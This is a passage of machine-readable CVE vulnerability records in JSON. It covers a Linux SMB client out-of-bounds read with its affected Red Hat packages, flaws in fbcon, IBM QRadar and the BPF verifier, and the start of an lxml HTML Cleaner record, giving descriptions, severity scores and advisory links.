"https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:enterprise_linux:8::realtime", "cpe:/a:redhat:enterprise_linux:8::nfv" ], "defaultStatus": "affected", "packageName": "kernel-rt", "product": "Red Hat Enterprise Linux 8", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.18.0-513.18.1.rt7.320.el8_9", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:8::baseos", "cpe:/a:redhat:enterprise_linux:8::crb" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 8", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.18.0-513.18.1.el8_9", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:rhel_eus:8.6::baseos", "cpe:/a:redhat:rhel_eus:8.6::crb", "cpe:/o:redhat:rhev_hypervisor:4.4::el8" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 8.6 Extended Update Support", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.18.0-372.95.1.el8_6", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:rhel_eus:8.8::baseos", "cpe:/a:redhat:rhel_eus:8.8::crb" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 8.8 Extended Update Support", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.18.0-477.51.1.el8_8", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:enterprise_linux:9::realtime", "cpe:/o:redhat:enterprise_linux:9::baseos", "cpe:/a:redhat:enterprise_linux:9::nfv", "cpe:/a:redhat:enterprise_linux:9::appstream", "cpe:/a:redhat:enterprise_linux:9::crb" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:5.14.0-362.24.1.el9_3", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:enterprise_linux:9::realtime", "cpe:/o:redhat:enterprise_linux:9::baseos", "cpe:/a:redhat:enterprise_linux:9::nfv", "cpe:/a:redhat:enterprise_linux:9::appstream", "cpe:/a:redhat:enterprise_linux:9::crb" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:5.14.0-362.24.1.el9_3", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:rhel_eus:9.2::crb", "cpe:/a:redhat:rhel_eus:9.2::appstream", "cpe:/o:redhat:rhel_eus:9.2::baseos" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 9.2 Extended Update Support", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:5.14.0-284.52.1.el9_2", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:rhel_eus:9.2::realtime", "cpe:/a:redhat:rhel_eus:9.2::nfv" ], "defaultStatus": "affected", "packageName": "kernel-rt", "product": "Red Hat Enterprise Linux 9.2 Extended Update Support", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:5.14.0-284.52.1.rt14.337.el9_2", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:rhel_eus:8.6::baseos", "cpe:/a:redhat:rhel_eus:8.6::crb", "cpe:/o:redhat:rhev_hypervisor:4.4::el8" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Virtualization 4 for Red Hat Enterprise Linux 8", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.18.0-372.95.1.el8_6", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:logging:5.8::el9" ], "defaultStatus": "affected", "packageName": "openshift-logging/cluster-logging-operator-bundle", "product": "RHOL-5.8-RHEL-9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "v5.8.6-22", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:logging:5.8::el9" ], "defaultStatus": "affected", "packageName": "openshift-logging/cluster-logging-rhel9-operator", "product": "RHOL-5.8-RHEL-9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "v5.8.6-11", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:logging:5.8::el9" ], "defaultStatus": "affected", "packageName": "openshift-logging/elasticsearch6-rhel9", "product": "RHOL-5.8-RHEL-9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "v6.8.1-407", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:logging:5.8::el9" ], "defaultStatus": "affected", "packageName": "openshift-logging/elasticsearch-operator-bundle", "product": "RHOL-5.8-RHEL-9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "v5.8.6-19", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:logging:5.8::el9" ], "defaultStatus": "affected", "packageName": "openshift-logging/elasticsearch-proxy-rhel9", "product": "RHOL-5.8-RHEL-9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "v1.0.0-479", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:logging:5.8::el9" ], "defaultStatus": "affected", "packageName": "openshift-logging/elasticsearch-rhel9-operator", "product": "RHOL-5.8-RHEL-9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "v5.8.6-7", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:logging:5.8::el9" ], "defaultStatus": "affected", "packageName": "openshift-logging/eventrouter-rhel9", "product": "RHOL-5.8-RHEL-9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "v0.4.0-247", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:logging:5.8::el9" ], "defaultStatus": "affected", "packageName": "openshift-logging/fluentd-rhel9", "product": "RHOL-5.8-RHEL-9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "v5.8.6-5", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:logging:5.8::el9" ], "defaultStatus": "affected", "packageName": "openshift-logging/log-file-metric-exporter-rhel9", "product": "RHOL-5.8-RHEL-9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "v1.1.0-227", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:logging:5.8::el9" ], "defaultStatus": "affected", "packageName": "openshift-logging/logging-curator5-rhel9", "product": "RHOL-5.8-RHEL-9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "v5.8.1-470", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:logging:5.8::el9" ], "defaultStatus": "affected", "packageName": "openshift-logging/logging-loki-rhel9", "product": "RHOL-5.8-RHEL-9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "v2.9.6-14", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:logging:5.8::el9" ], "defaultStatus": "affected", "packageName": "openshift-logging/logging-view-plugin-rhel9", "product": "RHOL-5.8-RHEL-9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "v5.8.6-2", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:logging:5.8::el9" ], "defaultStatus": "affected", "packageName": "openshift-logging/loki-operator-bundle", "product": "RHOL-5.8-RHEL-9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "v5.8.6-24", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:logging:5.8::el9" ], "defaultStatus": "affected", "packageName": "openshift-logging/loki-rhel9-operator", "product": "RHOL-5.8-RHEL-9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "v5.8.6-10", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:logging:5.8::el9" ], "defaultStatus": "affected", "packageName": "openshift-logging/lokistack-gateway-rhel9", "product": "RHOL-5.8-RHEL-9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "v0.1.0-525", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:logging:5.8::el9" ], "defaultStatus": "affected", "packageName": "openshift-logging/opa-openshift-rhel9", "product": "RHOL-5.8-RHEL-9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "v0.1.0-224", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:logging:5.8::el9" ], "defaultStatus": "affected", "packageName": "openshift-logging/vector-rhel9", "product": "RHOL-5.8-RHEL-9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "v0.28.1-56", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:6" ], "defaultStatus": "unknown", "packageName": "kernel", "product": "Red Hat Enterprise Linux 6", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:7" ], "defaultStatus": "unknown", "packageName": "kernel", "product": "Red Hat Enterprise Linux 7", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:7" ], "defaultStatus": "unknown", "packageName": "kernel-rt", "product": "Red Hat Enterprise Linux 7", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:9" ], "defaultStatus": "affected", "packageName": "kernel-rt", "product": "Red Hat Enterprise Linux 9", "vendor": "Red Hat" } ], "datePublic": "2023-12-04T00:00:00+00:00", "descriptions": [ { "lang": "en", "value": "An out-of-bounds read vulnerability was found in smbCalcSize in fs/smb/client/netmisc.c in the Linux Kernel. This issue could allow a local attacker to crash the system or leak internal kernel information." } ], "metrics": [ { "other": { "content": { "namespace": "https://access.redhat.com/security/updates/classification/", "value": "Moderate" }, "type": "Red Hat severity rating" } }, { "cvssV3_1": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H", "version": "3.1" }, "format": "CVSS" } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-125", "description": "Out-of-bounds Read", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2024-09-13T23:30:32.954Z", "orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "shortName": "redhat" }, "references": [ { "name": "RHSA-2024:0723", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:0723" }, { "name": "RHSA-2024:0725", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:0725" }, { "name": "RHSA-2024:0881", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:0881" }, { "name": "RHSA-2024:0897", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:0897" }, { "name": "RHSA-2024:1188", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:1188" }, { "name": "RHSA-2024:1248", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:1248" }, { "name": "RHSA-2024:1404", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:1404" }, { "name": "RHSA-2024:2094", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:2094" }, { "tags": [ "vdb-entry", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/security/cve/CVE-2023-6606" }, { "url": "https://bugzilla.kernel.org/show_bug.cgi?id=218218" }, { "name": "RHBZ#2253611", "tags": [ "issue-tracking", "x_refsource_REDHAT" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2253611" } ], "timeline": [ { "lang": "en", "time": "2023-12-08T00:00:00+00:00", "value": "Reported to Red Hat." }, { "lang": "en", "time": "2023-12-04T00:00:00+00:00", "value": "Made public." } ], "title": "Kernel: out-of-bounds read vulnerability in smbcalcsize", "workarounds": [ { "lang": "en", "value": "To mitigate this issue, prevent module cifs from being loaded. Please see https://access.redhat.com/solutions/41278 for how to blacklist a kernel module to prevent it from loading automatically." } ], "x_redhatCweChain": "CWE-125: Out-of-bounds Read" } }, "cveMetadata": { "assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "assignerShortName": "redhat", "cveId": "CVE-2023-6606", "datePublished": "2023-12-08T16:58:08.746Z", "dateReserved": "2023-12-08T07:45:03.358Z", "dateUpdated": "2024-09-13T23:30:32.954Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-3161
Vulnerability from cvelistv5
Published
2023-06-12 00:00
Modified
2024-08-02 06:48
Severity ?
EPSS score ?
Summary
A flaw was found in the Framebuffer Console (fbcon) in the Linux Kernel. When providing font->width and font->height greater than 32 to fbcon_set_font, since there are no checks in place, a shift-out-of-bounds occurs leading to undefined behavior and possible denial of service.
References
Impacted products
▼ | Vendor | Product |
---|---|---|
n/a | Linux Kernel (fbcon) |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-02T06:48:07.681Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2213485" }, { "tags": [ "x_transferred" ], "url": "https://github.com/torvalds/linux/commit/2b09d5d364986f724f17001ccfe4126b9b43a0be" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "Linux Kernel (fbcon)", "vendor": "n/a", "versions": [ { "status": "affected", "version": "Fixed in kernel 6.2-rc7" } ] } ], "descriptions": [ { "lang": "en", "value": "A flaw was found in the Framebuffer Console (fbcon) in the Linux Kernel. When providing font-\u003ewidth and font-\u003eheight greater than 32 to fbcon_set_font, since there are no checks in place, a shift-out-of-bounds occurs leading to undefined behavior and possible denial of service." } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-1335", "description": "CWE-1335", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2023-06-12T00:00:00", "orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "shortName": "redhat" }, "references": [ { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2213485" }, { "url": "https://github.com/torvalds/linux/commit/2b09d5d364986f724f17001ccfe4126b9b43a0be" } ] } }, "cveMetadata": { "assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "assignerShortName": "redhat", "cveId": "CVE-2023-3161", "datePublished": "2023-06-12T00:00:00", "dateReserved": "2023-06-08T00:00:00", "dateUpdated": "2024-08-02T06:48:07.681Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2024-27269
Vulnerability from cvelistv5
Published
2024-05-10 16:58
Modified
2024-08-02 00:27
Severity ?
EPSS score ?
Summary
IBM QRadar SIEM information disclosure
References
▼ | URL | Tags |
---|---|---|
https://www.ibm.com/support/pages/node/7150684 | vendor-advisory | |
https://exchange.xforce.ibmcloud.com/vulnerabilities/284575 | vdb-entry |
Impacted products
▼ | Vendor | Product |
---|---|---|
IBM | QRadar SIEM |
{ "containers": { "adp": [ { "affected": [ { "cpes": [ "cpe:2.3:a:ibm:qradar_siem:7.5:*:*:*:*:*:*:*" ], "defaultStatus": "unknown", "product": "qradar_siem", "vendor": "ibm", "versions": [ { "status": "affected", "version": "7.5" } ] } ], "metrics": [ { "other": { "content": { "id": "CVE-2024-27269", "options": [ { "Exploitation": "none" }, { "Automatable": "no" }, { "Technical Impact": "total" } ], "role": "CISA Coordinator", "timestamp": "2024-05-10T20:06:18.582689Z", "version": "2.0.3" }, "type": "ssvc" } } ], "providerMetadata": { "dateUpdated": "2024-06-04T17:47:00.230Z", "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "shortName": "CISA-ADP" }, "title": "CISA ADP Vulnrichment" }, { "providerMetadata": { "dateUpdated": "2024-08-02T00:27:59.955Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://www.ibm.com/support/pages/node/7150684" }, { "tags": [ "vdb-entry", "x_transferred" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/284575" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "defaultStatus": "unaffected", "product": "QRadar SIEM", "vendor": "IBM", "versions": [ { "status": "affected", "version": "7.5" } ] } ], "descriptions": [ { "lang": "en", "supportingMedia": [ { "base64": false, "type": "text/html", "value": "IBM QRadar SIEM 7.5 could allow a privileged user to configure user management that would disclose unintended sensitive information across tenants. IBM X-Force ID: 284575." } ], "value": "IBM QRadar SIEM 7.5 could allow a privileged user to configure user management that would disclose unintended sensitive information across tenants. IBM X-Force ID: 284575." } ], "metrics": [ { "cvssV3_1": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.8, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "HIGH", "scope": "CHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N", "version": "3.1" }, "format": "CVSS", "scenarios": [ { "lang": "en", "value": "GENERAL" } ] } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-286", "description": "CWE-286 Incorrect User Management", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2024-05-10T16:58:20.964Z", "orgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "shortName": "ibm" }, "references": [ { "tags": [ "vendor-advisory" ], "url": "https://www.ibm.com/support/pages/node/7150684" }, { "tags": [ "vdb-entry" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/284575" } ], "source": { "discovery": "UNKNOWN" }, "title": "IBM QRadar SIEM information disclosure", "x_generator": { "engine": "Vulnogram 0.1.0-dev" } } }, "cveMetadata": { "assignerOrgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "assignerShortName": "ibm", "cveId": "CVE-2024-27269", "datePublished": "2024-05-10T16:58:20.964Z", "dateReserved": "2024-02-22T01:26:52.586Z", "dateUpdated": "2024-08-02T00:27:59.955Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-2163
Vulnerability from cvelistv5
Published
2023-09-20 05:02
Modified
2024-08-09 19:05
Severity ?
EPSS score ?
Summary
Incorrect Verifier Branch Pruning Logic Leads To Arbitrary Read/Write In Linux Kernel and Lateral Privilege Escalation
References
Impacted products
▼ | Vendor | Product |
---|---|---|
Linux | Linux Kernel |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-09T19:05:37.091Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "technical-description" ], "url": "https://bughunters.google.com/blog/6303226026131456/a-deep-dive-into-cve-2023-2163-how-we-found-and-fixed-an-ebpf-linux-kernel-vulnerability" }, { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=71b547f561247897a0a14f3082730156c0533fed" } ], "title": "CVE Program Container", "x_generator": { "engine": "ADPogram 0.0.1" } } ], "cna": { "affected": [ { "defaultStatus": "unaffected", "product": "Linux Kernel", "vendor": "Linux", "versions": [ { "lessThan": "5.4", "status": "unaffected", "version": "0", "versionType": "custom" }, { "lessThan": "71b547f561247897a0a14f3082730156c0533fed", "status": "affected", "version": "0", "versionType": "git" } ] } ], "descriptions": [ { "lang": "en", "supportingMedia": [ { "base64": false, "type": "text/html", "value": "\u003cspan style=\"background-color: rgb(255, 255, 255);\"\u003eIncorrect verifier pruning\u0026nbsp;\u003c/span\u003ein BPF in Linux Kernel\u0026nbsp;\u0026gt;=5.4\u0026nbsp;\u003cspan style=\"background-color: rgb(255, 255, 255);\"\u003eleads to unsafe\u003c/span\u003e\u003cbr\u003e\u003cspan style=\"background-color: rgb(255, 255, 255);\"\u003ecode paths being incorrectly marked as safe, resulting in\u003c/span\u003e\u0026nbsp;arbitrary read/write in\u003cbr\u003ekernel memory, lateral privilege escalation, and container escape.\u003cbr\u003e" } ], "value": "Incorrect verifier pruning\u00a0in BPF in Linux Kernel\u00a0\u003e=5.4\u00a0leads to unsafe\ncode paths being incorrectly marked as safe, resulting in\u00a0arbitrary read/write in\nkernel memory, lateral privilege escalation, and container escape." } ], "impacts": [ { "capecId": "CAPEC-233", "descriptions": [ { "lang": "en", "value": "CAPEC-233 Privilege Escalation" } ] } ], "metrics": [ { "cvssV3_1": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 10, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N", "version": "3.1" }, "format": "CVSS", "scenarios": [ { "lang": "en", "value": "GENERAL" } ] } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-682", "description": "CWE-682 Incorrect Calculation", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2024-05-21T03:43:35.053Z", "orgId": "14ed7db2-1595-443d-9d34-6215bf890778", "shortName": "Google" }, "references": [ { "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=71b547f561247897a0a14f3082730156c0533fed" } ], "source": { "discovery": "UNKNOWN" }, "title": "Incorrect Verifier Branch Pruning Logic Leads To Arbitrary Read/Write In Linux Kernel and Lateral Privilege Escalation", "x_generator": { "engine": "Vulnogram 0.1.0-dev" } } }, "cveMetadata": { "assignerOrgId": "14ed7db2-1595-443d-9d34-6215bf890778", "assignerShortName": "Google", "cveId": "CVE-2023-2163", "datePublished": "2023-09-20T05:02:38.155Z", "dateReserved": "2023-04-18T18:22:35.441Z", "dateUpdated": "2024-08-09T19:05:37.091Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2021-43818
Vulnerability from cvelistv5
Published
2021-12-13 18:05
Modified
2024-08-04 04:03
Severity ?
EPSS score ?
Summary
HTML Cleaner allows crafted and SVG embedded scripts to pass through
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-04T04:03:08.992Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "https://github.com/lxml/lxml/security/advisories/GHSA-55x5-fj6c-h6m8" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://github.com/lxml/lxml/commit/12fa9669007180a7bb87d990c375cf91ca5b664a" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://github.com/lxml/lxml/commit/a3eacbc0dcf1de1c822ec29fb7d090a4b1712a9c#diff-59130575b4fb2932c957db2922977d7d89afb0b2085357db1a14615a2fcad776" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://github.com/lxml/lxml/commit/f2330237440df7e8f39c3ad1b1aa8852be3b27c0" }, { "name": "FEDORA-2021-6e8fb79f90", "tags": [ "vendor-advisory", "x_refsource_FEDORA", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ZQ4SPKJX3RRJK4UWA6FXCRHD2TVRQI44/" }, { "name": "FEDORA-2021-9f9e7c5c4f", "tags": [ "vendor-advisory", "x_refsource_FEDORA", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/WZGNET2A4WGLSUXLBFYKNC5PXHQMI3I7/" }, { "name": "[debian-lts-announce] 20211230 [SECURITY] [DLA 2871-1] lxml security update", "tags": [ "mailing-list", "x_refsource_MLIST", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2021/12/msg00037.html" }, { "name": "DSA-5043", "tags": [ "vendor-advisory", "x_refsource_DEBIAN", "x_transferred" ], "url": "https://www.debian.org/security/2022/dsa-5043" }, { "name": "FEDORA-2022-96c79bf003", "tags": [ "vendor-advisory", "x_refsource_FEDORA", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/TUIS2KE3HZ2AAQKXFLTJFZPP2IFHJTC7/" }, { "name": "FEDORA-2022-7129fbaeed", "tags": [ "vendor-advisory", "x_refsource_FEDORA", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/V2XMOM5PFT6U5AAXY6EFNT5JZCKKHK2V/" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://www.oracle.com/security-alerts/cpuapr2022.html" }, { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20220107-0005/" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://www.oracle.com/security-alerts/cpujul2022.html" }, { "name": "GLSA-202208-06", "tags": [ "vendor-advisory", "x_refsource_GENTOO", "x_transferred" ], "url": "https://security.gentoo.org/glsa/202208-06" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "lxml", "vendor": "lxml", "versions": [ { "status": "affected", "version": "\u003c 4.6.5" } ] } ], "descriptions": [ { "lang": "en", "value": "lxml is a library for processing XML and HTML in the Python language. Prior to version 4.6.5, the HTML Cleaner in lxml.html lets certain crafted script content pass through, as well as script content in SVG files embedded using data URIs. Users that employ the HTML cleaner in a security relevant context should upgrade to lxml 4.6.5 to receive a patch. There are no known workarounds available." } ], "metrics": [ { "cvssV3_1": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 8.2, "baseSeverity": "HIGH", "confidentialityImpact": "LOW", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:H/A:N", "version": "3.1" } } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-74", "description": "CWE-74: Improper Neutralization of Special Elements in Output Used by a Downstream Component (\u0027Injection\u0027)", "lang": "en", "type": "CWE" } ] }, { "descriptions": [ { "cweId": "CWE-79", "description": "CWE-79: Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2022-08-10T05:06:57", "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa", "shortName": "GitHub_M" }, "references": [ { "tags": [ "x_refsource_CONFIRM" ], "url": "https://github.com/lxml/lxml/security/advisories/GHSA-55x5-fj6c-h6m8" }, { "tags": [ "x_refsource_MISC" ], "url": "https://github.com/lxml/lxml/commit/12fa9669007180a7bb87d990c375cf91ca5b664a" }, { "tags": [ "x_refsource_MISC" ], "url": "https://github.com/lxml/lxml/commit/a3eacbc0dcf1de1c822ec29fb7d090a4b1712a9c#diff-59130575b4fb2932c957db2922977d7d89afb0b2085357db1a14615a2fcad776" }, { "tags": [ "x_refsource_MISC" ], "url": "https://github.com/lxml/lxml/commit/f2330237440df7e8f39c3ad1b1aa8852be3b27c0" }, { "name": "FEDORA-2021-6e8fb79f90", "tags": [ "vendor-advisory", 